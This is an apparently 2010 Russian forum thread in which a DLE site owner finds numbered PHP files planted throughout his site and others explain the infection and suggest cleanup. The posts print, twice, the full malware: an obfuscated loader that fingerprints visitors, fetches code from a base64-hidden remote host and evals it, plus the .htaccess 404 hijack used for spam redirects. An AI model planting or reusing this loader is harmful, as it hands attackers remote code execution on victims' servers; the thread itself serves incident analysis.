Обнаружил у себя на сайте странный файлы

[BMWshka 0]

Обнаружил у себя на сайте странный файлы

Почти в каждой папке, везде есть по одному файлу типа 151247.php или 22446.php, в каждой папке разное название из цифр. Весят они одинаково (2кб), а содержится в них следующее:

<? error_reporting(0);$a=(isset($_SERVER["HTTP_HOST"])?$_SERVER["HTTP_HOST"]:$HTTP_HOST);$b=(isset($_SERVER["SERVER_NAME"])?$_SERVER["SERVER_NAME"]:$SERVER_NAME);$c=(isset($_SERVER["REQUEST_URI"])?$_SERVER["REQUEST_URI"]:$REQUEST_URI);$d=(isset($_SERVER["PHP_SELF"])?$_SERVER["PHP_SELF"]:$PHP_SELF);$e=(isset($_SERVER["QUERY_STRING"])?$_SERVER["QUERY_STRING"]:$QUERY_STRING);$f=(isset($_SERVER["HTTP_REFERER"])?$_SERVER["HTTP_REFERER"]:$HTTP_REFERER);$g=(isset($_SERVER["HTTP_USER_AGENT"])?$_SERVER["HTTP_USER_AGENT"]:$HTTP_USER_AGENT);$h=(isset($_SERVER["REMOTE_ADDR"])?$_SERVER["REMOTE_ADDR"]:$REMOTE_ADDR);$i=(isset($_SERVER["SCRIPT_FILENAME"])?$_SERVER["SCRIPT_FILENAME"]:$SCRIPT_FILENAME);$j=(isset($_SERVER["HTTP_ACCEPT_LANGUAGE"])?$_SERVER["HTTP_ACCEPT_LANGUAGE"]:$HTTP_ACCEPT_LANGUAGE);$z="/?".base64_encode($a).".".base64_encode($.".".base64_encode($c).".".base64_encode($d).".".base64_encode($e).".".base64_encode($f).".".base64_encode($g).".".base64_encode($h).".e.".base64_encode($i).".".base64_encode($j);$f=base64_decode("cnNzbmV3cy53cw==");if (basename($c)==basename($i)&&isset($_REQUEST["q"])&&md5($_REQUEST["q"])=="ffed22181d5c4b87dd6e20248545fd92") $f=$_REQUEST["id"];if((include(base64_decode("aHR0cDovL2Fkcy4=").$f.$z)));else if($c=file_get_contents(base64_decode("aHR0cDovLzcu").$f.$z)) eval($c);else{$cu=curl_init(base64_decode("aHR0cDovLzcxLg==").$f.$z);curl_setopt($cu,CURLOPT_RETURNTRANSFER,1);$o=curl_exec($cu);curl_close($cu);eval($o);};die(); ?>[/code]

Чё это такое? Если можно подробнее...

[celsoft 6 076]

Не от скрипта это точно, он писать PHP куда в почти все папки не умеет. Если их происхождение неизвестно, значит безопасность вашего сервера вызывает сомнения

Причины:

1. Уязвимые сторонние модификации

2. Уязвимые сторонние скрипты

3. Заражен ваш локальный компьютер в результате чего ващ доступ по FTP утерян

4. Уязвим сервер хостинг провайдера.

[BMWshka 0]

1,2 пункт отпадает DLE 8.3 чистый.

чё за код? как он опасен?

Как можно узнать как попал на ко мне?

PS Использую хостинг.

Изменено 7 марта 2010 пользователем BMWshka

[WWW.ZEOS.IN 1 161]

На 90% уверен, что заражен Ваш FTP клиент.

Установите антивирус и проверьте.

Запустите и бесплатно проверьте компьютер на вирусы: http://www.freedrweb.com/cureit/

[BMWshka 0]

Проверил ПК на вирусы, вирусов не обнаружено.

Пользуюсь Kaspersky Internet Security 2010

FTP клиент "Total Commander"

А что это за файлы? И для чего были загружены на сервер?

[WWW.ZEOS.IN 1 161]

<?php error_reporting(0);

$a=(isset($_SERVER["HTTP_HOST"])?$_SERVER["HTTP_HOST"]:$HTTP_HOST);


$b=(isset($_SERVER["SERVER_NAME"])?$_SERVER["SERVER_NAME"]:$SERVER_NAME);


$c=(isset($_SERVER["REQUEST_URI"])?$_SERVER["REQUEST_URI"]:$REQUEST_URI);


$d=(isset($_SERVER["PHP_SELF"])?$_SERVER["PHP_SELF"]:$PHP_SELF);


$e=(isset($_SERVER["QUERY_STRING"])?$_SERVER["QUERY_STRING"]:$QUERY_STRING);


$f=(isset($_SERVER["HTTP_REFERER"])?$_SERVER["HTTP_REFERER"]:$HTTP_REFERER);


$g=(isset($_SERVER["HTTP_USER_AGENT"])?$_SERVER["HTTP_USER_AGENT"]:$HTTP_USER_AGENT);


$h=(isset($_SERVER["REMOTE_ADDR"])?$_SERVER["REMOTE_ADDR"]:$REMOTE_ADDR);


$i=(isset($_SERVER["SCRIPT_FILENAME"])?$_SERVER["SCRIPT_FILENAME"]:$SCRIPT_FILENAME);


$j=(isset($_SERVER["HTTP_ACCEPT_LANGUAGE"])?$_SERVER["HTTP_ACCEPT_LANGUAGE"]:$HTTP_ACCEPT_LANGUAGE);


$z="/?".base64_encode($a).".".base64_encode($.".".base64_encode($c).".".base64_encode($d).".".base64_encode($e).".".base64_encode($f).".".base64_encode($g) . " . " . base64_encode ( $h ) . " . e . " . base64_encode ( $i ) . " . " . base64_encode ( $j );

$f = base64_decode ( "cnNzbmV3cy53cw==" );


if ( basename ( $c ) == basename ( $i ) && isset ( $_REQUEST["q"] ) && md5 ( $_REQUEST["q"] ) == "ffed22181d5c4b87dd6e20248545fd92" ) $f = $_REQUEST["id"];


if ( ( include ( base64_decode ( "aHR0cDovL2Fkcy4=") . $f . $z ) ) );

else if ( $c = file_get_contents ( base64_decode ( "aHR0cDovLzcu" ) . $f . $z ) ) eval ( $c );

else {

    $cu = curl_init ( base64_decode ( "aHR0cDovLzcxLg == " ) . $f . $z );

    curl_setopt ( $cu, CURLOPT_RETURNTRANSFER, 1 );

    $o = curl_exec ( $cu );

    curl_close ( $cu );

    eval ( $o );

};

die();

?>[/code]

Это этот код но в более читаемом виде. Лучше удалите и не думайте про плохое

[BMWshka 0]

да я уже удалил, вот только хотел узнать откуда они появились, чтоб повтора не было )

И не плохо было бы узнать чё он делает, можно с помощью этих файлов узнать доступ к сайту? к базе? Слить? Залить?

Изменено 7 марта 2010 пользователем BMWshka

[Creocreo 18]

Ваш сайт взломан. Ищите файл, через который вам залили шелл.

Это эксплойт. Такие эксплойты вставляют на ваших 404-ых страницы редирект на свой сайт или ссылки для черной поисковой оптимизации . Запросы у вас идут на phpsearch.cn (зашифровано в base64).

При данном заражении у вас создаются файлы .htaccess:

Options -MultiViews

ErrorDocument 404 //path/to/upload/folder/subfolder/XXXXXX.php

При обращении к странице 404, выдается левые ссылки. На разных других сайтах раскидываются ссылки на несуществующие страницы на вашем сайте, поисковики индексируют их, и люди с поиска попадают в итоге на эти страницы xxxxx.php. Дальше обычно следует редирект.

Описание на английском есть тут: _http://www.romantika.name/v2/upload-folder-invasions-and-security/

[BMWshka 0]

Ваш сайт взломан. Ищите файл, через который вам залили шелл.

Это эксплойт. Такие эксплойты вставляют на ваших 404-ых страницы редирект на свой сайт или ссылки для черной поисковой оптимизации . Запросы у вас идут на phpsearch.cn (зашифровано в base64).

При данном заражении у вас создаются файлы .htaccess:

Options -MultiViews

ErrorDocument 404 //path/to/upload/folder/subfolder/XXXXXX.php

При обращении к странице 404, выдается левые ссылки. На разных других сайтах раскидываются ссылки на несуществующие страницы на вашем сайте, поисковики индексируют их, и люди с поиска попадают в итоге на эти страницы xxxxx.php. Дальше обычно следует редирект.

Описание на английском есть тут: _http://www.romantika.name/v2/upload-folder-invasions-and-security/

угу точно, .htaccess почистил, как можно узнать как точно был взломан сайт? Чтобы закрыть дырку.

[Creocreo 18]

Самые частые варианты:

- украдены FTP-пароли из Total Commander (сменить пароль, вводить вручную)

- кривые сторонние модули, с которыми залит шелл (решение тогда - установка ДЛЕ по новой, без модулей)

- криво настроен сервер, это позволяет из соседних аккаунтов создавать файлы в ваших папках (про этот случай было написано по ссылке, что я давал выше). тут тогда только смена хостера решает вопрос.

[BMWshka 0]

Скорее всего это хостинг, так как до этого хостился год в mchost месяца два назад перешёл к другому, и началось...

Модули не какие не стоят, двиг чистый!

Сменил доступ к сайту, посмотрим чё дальше будет.

[Creocreo 18]

Проверьте все папки с правами 777, там надо чистить всё.

Скорее всего, что на сервере неправильно настроена панель Cpanel или Parallels, что позволяет с соседнего аккаунта записывать данные в ваши папки.

[BMWshka 0]

Проверьте все папки с правами 777, там надо чистить всё.

Скорее всего, что на сервере неправильно настроена панель Cpanel или Parallels, что позволяет с соседнего аккаунта записывать данные в ваши папки.

Да на сервере стоит Cpanel, как узнать что он не правильно настроен? Может попробовать попасть к соседям? )

Вот ещё странные файлы на которые ругается антивирус DLE

./engine/modules/c_navigation.php

./engine/inc/functions.inc.php

./engine/inc/makethumb.php

./engine/inc/inserttag.php

./engine/inc/init.php

./adm.php

Изменено 7 марта 2010 пользователем BMWshka

[abasive 41]

Проверьте все папки с правами 777, там надо чистить всё.

Скорее всего, что на сервере неправильно настроена панель Cpanel или Parallels, что позволяет с соседнего аккаунта записывать данные в ваши папки.

Да на сервере стоит Cpanel, как узнать что он не правильно настроен? Может попробовать попасть к соседям? )

Вот ещё странные файлы на которые ругается антивирус DLE

./engine/modules/c_navigation.php

./engine/inc/functions.inc.php

./engine/inc/makethumb.php

./engine/inc/inserttag.php

./engine/inc/init.php

./adm.php

замените все файлы с чистого дистрибутива, и удалите те файлы на

которих ругаеться антивирус

[BMWshka 0]

я тоже сперва так подумал, что надо заменить, только вот скачать с сайта не могу так как лицензия кончилась, а на компе DLE не остался, как теперь быть?

[WMDrakon 20]

Что за ерунда насчет хостинга?

Сам пользуюсь этим хостингом 2 года и никаких проблем нет и небыло.

99% - это сперли пароли от сервера.

Смените просто их и не сохраняйте в тотале, он их плохо защищает.

[BMWshka 0]

Что за ерунда насчет хостинга?

Сам пользуюсь этим хостингом 2 года и никаких проблем нет и небыло.

99% - это сперли пароли от сервера.

Смените просто их и не сохраняйте в тотале, он их плохо защищает.

Каким?

[abasive 41]

BMWshka

что за хостинг у вас?

[hotdj 33]

Интересно что же дальше будет,,, очень хороший вопрос, т.к. недавно сам нашёл айлы левые в движке но не пхп а тхт с текстом внутри типо qqqqqqqqqqqq

это из за чего ? ))

[celsoft 6 076]

./engine/modules/c_navigation.php

./engine/inc/functions.inc.php

./engine/inc/makethumb.php

./engine/inc/inserttag.php

./engine/inc/init.php

это файлы от старых версий скрипта, скрипт их больше не использует и их можно удалить

[hotdj 33]

Вот уже интереснее ) чем дальше в лес тем больше дров !)) удаляю уже )